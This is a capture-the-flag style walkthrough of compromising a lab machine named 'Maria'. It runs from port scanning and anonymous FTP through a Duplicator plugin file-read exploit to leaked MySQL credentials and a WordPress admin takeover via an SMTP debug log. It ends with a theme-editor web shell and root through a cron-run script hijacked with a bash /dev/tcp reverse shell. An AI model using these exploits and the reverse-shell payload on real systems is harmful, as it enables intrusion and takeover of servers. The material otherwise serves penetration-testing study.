Maria
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.243.167
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:28 +08
Nmap scan report for 192.168.243.167
Host is up (0.17s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Did a detailed scan too:
$ nmap -p 21,22,80,3306 -sC -sV --min-rate 3000 -Pn 192.168.243.167
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:30 +08
Nmap scan report for 192.168.243.167
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 5 0 0 4096 Sep 21 2018 automysqlbackup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.231
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74ba2023899262029fe73d3b83d4d96c (RSA)
| 256 548f79555ab03a695ad5723964fd074e (ECDSA)
|_ 256 7f5d102762ba75e9bcc84fe27287d4e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Maria
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.1
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
So port 21 has a file anonymous access, while port 80 is running Wordpress.
FTP Anonymous Creds
We can first enumerate this:
$ ftp 192.168.243.167
Connected to 192.168.243.167.
220 (vsFTPd 3.0.3)
Name (192.168.243.167:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
lsftp> ls
229 Entering Extended Passive Mode (|||10090|)
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Sep 21 2018 automysqlbackup
226 Directory send OK.
ftp> cd automysqlbackup
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10096|)
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Sep 21 2018 etc
drwxr-xr-x 4 0 0 4096 Sep 21 2018 usr
drwxr-xr-x 3 0 0 4096 Sep 21 2018 var
The /usr
directory contained a automysqlbackup
script:
ftp> cd usr
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10093|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 21 2018 sbin
drwxr-xr-x 4 0 0 4096 Sep 21 2018 share
226 Directory send OK.
ftp> cd sbin
l250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10090|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 26047 Sep 21 2018 automysqlbackup
I cannot download this file, but we can take note of the directory its in. The /etc
folder also contained one:
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10093|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 21 2018 automysqlbackup
drwxr-xr-x 2 0 0 4096 Sep 21 2018 cron.daily
drwxr-xr-x 2 0 0 4096 Sep 21 2018 default
226 Directory send OK.
ftp> cd default
l250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10093|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3442 Sep 21 2018 automysqlbackup
Wordpress LFI -> SQL Creds
I ran an nmap
script against Wordpress and it found this:
$ nmap --script http-wordpress-enum -p 80 192.168.243.167
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:35 +08
Nmap scan report for 192.168.243.167
Host is up (0.22s latency).
PORT STATE SERVICE
80/tcp open http
| http-wordpress-enum:
| Search limited to top 100 themes/plugins
| plugins
| akismet
|_ duplicator 1.3.26
For some reason wpscan
doesn't pick up on these. Anyways, this version of Duplicator is vulnerable to an LFI.
$ searchsploit duplicator 1.3.26
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read | php/webapps/50420.py
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit) | php/webapps/49288.rb
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
It works!
$ python3 50420.py http://192.168.243.167 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:107:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-exim:x:108:115::/var/spool/exim4:/usr/sbin/nologin
joseph:x:1000:1000::/home/joseph:/bin/sh
From this, we can read the automysqlbackup
file. It turns out to be a very long bash
script with a lot of irrelevant stuff. We can read the /etc/default/automysqlbackup
file to find some credentials:
$ python3 50420.py http://192.168.243.167 /etc/default/automysqlbackup
# Username to access the MySQL server e.g. dbuser
USERNAME=backup
# Username to access the MySQL server e.g. password
PASSWORD=EverydayAndEverynight420
# Host name (or IP address) of MySQL server e.g localhost
DBHOST=localhost
With this, we can login to the MySQL instance.
MySQL Enum -> WP Plugins -> Reset Mail
$ mysql -h 192.168.243.167 -u backup -pEverydayAndEverynight420
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 131
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.180 sec)
Let's enumerate wordpress
and get the administrator hash:
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------+--------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------+--------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BQRpFYXVT4fNnin4CFuOiqUHRWchS40 | admin | joseph@maria.pg | http://example.com | 2021-05-19 15:14:10 | | 0 | admin |
+----+------------+------------------------------------+---------------+-----------------+--------------------+---------------------+---------------------+-------------+--------------+
However, this hash was unable to be cracked. I also could not overwrite it in anyway. I tried to reset the password of the admin
user, but I could not get the confirmation link:

Seems like the only way to exploit this is to somehow capture that reset link. Within the wp_options
table, I found another active plugin:
| 33 | active_plugins | a:2:{i:0;s:25:"duplicator/duplicator.php";i:1;s:29:"easy-wp-smtp/easy-wp-smtp.php";}
It seems that easy-wp-smtp.php
is also enabled. And within the swpsmtp_options
part of the options, we can find a directory present:
| 132 | swpsmtp_options | a:10:{s:15:"from_name_field";s:5:"admin";s:23:"force_from_name_replace";b:0;s:8:"sub_mode";b:0;s:16:"from_email_field";s:13:"root@maria.pg";s:14:"reply_to_email";s:0:"";s:9:"bcc_email";s:0:"";s:17:"email_ignore_list";s:0:"";s:13:"smtp_settings";a:10:{s:4:"host";s:8:"maria.pg";s:15:"type_encryption";s:4:"none";s:13:"autentication";s:2:"no";s:8:"username";s:0:"";s:12:"enable_debug";i:1;s:12:"insecure_ssl";b:0;s:12:"encrypt_pass";b:0;s:8:"password";s:0:"";s:4:"port";s:2:"25";s:13:"log_file_name";s:27:"64b54599c2218_debug_log.txt";}s:19:"enable_domain_check";b:0;s:15:"allowed_domains";s:0:"";}
This file is located at /wp-content/plugins/easy-wp-smtp/
, and from it we can get the password reset link:

Once visited, we can reset the password of the admin
and login:

The exploit path to getting RCE from Wordpress is the same. (Appearance > Theme Editor > Replace 404.php with a PHP Web shell > Profit).

I reset the box here, so the IP addresses are different.
From here, we can easily get a reverse shell.

Privilege Escalation
Cronjob -> Binary Hijack
I ran pspy64
to enumerate the processes that were being run, and it found this:
2023/07/17 13:03:02 CMD: UID=0 PID=7830 | /bin/bash /usr/sbin/automysqlbackup
2023/07/17 13:03:02 CMD: UID=0 PID=7829 | /bin/bash /usr/sbin/automysqlbackup
2023/07/17 13:03:02 CMD: UID=0 PID=7831 | mail -s MySQL Backup Log for maria - 2023-07-17_13h03m root
I tried running the automysqlbackup
, but it resulted in loads of errors. Within the errors, I saw this:
$ /usr/sbin/automysqlbackup
<TRUNCATED>
/usr/sbin/automysqlbackup: line 656: /var/www/html/wordpress/backup_scripts/backup-post: No such file or directory
<TRUNCATED>
Seems that backup-post
is a binary run that is not present within a directory that we have write access to. We can easily create a reverse shell like this:
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.162/80 0>&1
Then we can place this within the /var/www/html/wordpress/backup_scripts
directory as backup-post
after running chmod 777
on it. We would get a reverse shell as root
after waiting for a bit:

Last updated